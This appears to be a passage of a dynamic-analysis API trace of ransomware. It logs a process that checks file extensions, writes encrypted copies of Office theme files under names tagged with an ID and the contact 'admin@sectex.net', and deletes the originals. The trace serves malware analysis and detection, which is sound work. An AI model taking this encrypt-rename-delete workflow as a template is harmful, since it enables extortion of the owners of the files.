	[0141.936] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.936] lstrlenW (lpString=".doc") returned 4
	[0141.936] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString=".docx") returned 5
	[0141.937] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.937] lstrlenW (lpString=".pdf") returned 4
	[0141.937] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString=".xls") returned 4
	[0141.937] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString=".xlsx") returned 5
	[0141.937] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.937] lstrlenW (lpString=".ppt") returned 4
	[0141.937] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.937] lstrlenW (lpString=".zip") returned 4
	[0141.937] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString=".rar") returned 4
	[0141.937] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString=".bz2") returned 4
	[0141.937] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString=".7z") returned 3
	[0141.937] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.937] lstrlenW (lpString=".dbf") returned 4
	[0141.937] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.937] lstrlenW (lpString=".1cd") returned 4
	[0141.937] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned 81
	[0141.937] lstrlenW (lpString=".jpg") returned 4
	[0141.937] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.937] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.937] lstrlenW (lpString="Hardcover.eftx") returned 14
	[0141.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.944] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=350689) returned 1
	[0141.944] CloseHandle (hObject=0x3c0) returned 1
	[0141.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx")) returned 0x20
	[0141.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.945] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.945] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.945] GetLastError () returned 0x0
	[0141.945] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x559e1, lpOverlapped=0x0) returned 1
	[0141.954] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x559f0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x559f0, lpOverlapped=0x0) returned 1
	[0141.960] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.960] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.960] SetEndOfFile (hFile=0x384) returned 1
	[0141.960] CloseHandle (hObject=0x384) returned 1
	[0141.960] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.960] SetEndOfFile (hFile=0x3c0) returned 1
	[0142.069] CloseHandle (hObject=0x3c0) returned 1
	[0142.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.069] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx")) returned 1
	[0142.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.070] lstrlenW (lpString=".doc") returned 4
	[0142.070] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString=".docx") returned 5
	[0142.070] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.070] lstrlenW (lpString=".pdf") returned 4
	[0142.070] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString=".xls") returned 4
	[0142.070] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString=".xlsx") returned 5
	[0142.070] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.070] lstrlenW (lpString=".ppt") returned 4
	[0142.070] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.070] lstrlenW (lpString=".zip") returned 4
	[0142.070] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString=".rar") returned 4
	[0142.070] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString=".bz2") returned 4
	[0142.070] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.070] lstrlenW (lpString=".7z") returned 3
	[0142.071] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.071] lstrlenW (lpString=".dbf") returned 4
	[0142.071] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.071] lstrlenW (lpString=".1cd") returned 4
	[0142.071] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.071] lstrlenW (lpString=".jpg") returned 4
	[0142.071] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.071] lstrlenW (lpString=".doc") returned 4
	[0142.071] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString=".docx") returned 5
	[0142.071] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.071] lstrlenW (lpString=".pdf") returned 4
	[0142.071] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString=".xls") returned 4
	[0142.071] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString=".xlsx") returned 5
	[0142.071] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.071] lstrlenW (lpString=".ppt") returned 4
	[0142.071] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.071] lstrlenW (lpString=".zip") returned 4
	[0142.071] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString=".rar") returned 4
	[0142.071] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString=".bz2") returned 4
	[0142.071] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.071] lstrlenW (lpString=".7z") returned 3
	[0142.071] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.072] lstrlenW (lpString=".dbf") returned 4
	[0142.072] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.072] lstrlenW (lpString=".1cd") returned 4
	[0142.072] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned 81
	[0142.072] lstrlenW (lpString=".jpg") returned 4
	[0142.072] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.072] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.072] lstrlenW (lpString="Opulent.eftx") returned 12
	[0142.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.193] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=32857) returned 1
	[0142.197] CloseHandle (hObject=0x384) returned 1
	[0142.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx")) returned 0x20
	[0142.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.215] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.215] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.216] GetLastError () returned 0x0
	[0142.216] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x8059, lpOverlapped=0x0) returned 1
	[0142.218] WriteFile (in: hFile=0x3a8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x8060, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x8060, lpOverlapped=0x0) returned 1
	[0142.220] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.220] WriteFile (in: hFile=0x3a8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.220] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.220] CloseHandle (hObject=0x3a8) returned 1
	[0142.220] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.220] SetEndOfFile (hFile=0x384) returned 1
	[0142.223] CloseHandle (hObject=0x384) returned 1
	[0142.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx")) returned 1
	[0142.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.225] lstrlenW (lpString=".doc") returned 4
	[0142.225] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString=".docx") returned 5
	[0142.225] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.225] lstrlenW (lpString=".pdf") returned 4
	[0142.225] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString=".xls") returned 4
	[0142.225] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString=".xlsx") returned 5
	[0142.225] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.225] lstrlenW (lpString=".ppt") returned 4
	[0142.225] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.225] lstrlenW (lpString=".zip") returned 4
	[0142.225] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString=".rar") returned 4
	[0142.225] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString=".bz2") returned 4
	[0142.225] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.225] lstrlenW (lpString=".7z") returned 3
	[0142.225] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.226] lstrlenW (lpString=".dbf") returned 4
	[0142.226] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.226] lstrlenW (lpString=".1cd") returned 4
	[0142.226] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.226] lstrlenW (lpString=".jpg") returned 4
	[0142.226] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.226] lstrlenW (lpString=".doc") returned 4
	[0142.226] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString=".docx") returned 5
	[0142.226] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.226] lstrlenW (lpString=".pdf") returned 4
	[0142.226] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString=".xls") returned 4
	[0142.226] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString=".xlsx") returned 5
	[0142.226] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.226] lstrlenW (lpString=".ppt") returned 4
	[0142.226] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.226] lstrlenW (lpString=".zip") returned 4
	[0142.226] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString=".rar") returned 4
	[0142.226] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString=".bz2") returned 4
	[0142.226] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.226] lstrlenW (lpString=".7z") returned 3
	[0142.226] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.227] lstrlenW (lpString=".dbf") returned 4
	[0142.227] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.227] lstrlenW (lpString=".1cd") returned 4
	[0142.227] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79
	[0142.227] lstrlenW (lpString=".jpg") returned 4
	[0142.227] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.227] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.227] lstrlenW (lpString="Slipstream.eftx") returned 15
	[0142.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.228] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=27789) returned 1
	[0142.228] CloseHandle (hObject=0x384) returned 1
	[0142.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx")) returned 0x20
	[0142.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.228] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.229] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.229] GetLastError () returned 0x0
	[0142.229] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x6c8d, lpOverlapped=0x0) returned 1
	[0142.231] WriteFile (in: hFile=0x3a8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6c90, lpOverlapped=0x0) returned 1
	[0142.232] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.233] WriteFile (in: hFile=0x3a8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0142.233] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.233] CloseHandle (hObject=0x3a8) returned 1
	[0142.233] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.233] SetEndOfFile (hFile=0x384) returned 1
	[0142.237] CloseHandle (hObject=0x384) returned 1
	[0142.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.237] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx")) returned 1
	[0142.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.238] lstrlenW (lpString=".doc") returned 4
	[0142.238] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString=".docx") returned 5
	[0142.238] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.238] lstrlenW (lpString=".pdf") returned 4
	[0142.238] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString=".xls") returned 4
	[0142.238] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString=".xlsx") returned 5
	[0142.238] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.238] lstrlenW (lpString=".ppt") returned 4
	[0142.238] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.238] lstrlenW (lpString=".zip") returned 4
	[0142.238] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString=".rar") returned 4
	[0142.238] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString=".bz2") returned 4
	[0142.238] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString=".7z") returned 3
	[0142.238] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.238] lstrlenW (lpString=".dbf") returned 4
	[0142.238] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.238] lstrlenW (lpString=".1cd") returned 4
	[0142.238] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.238] lstrlenW (lpString=".jpg") returned 4
	[0142.239] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
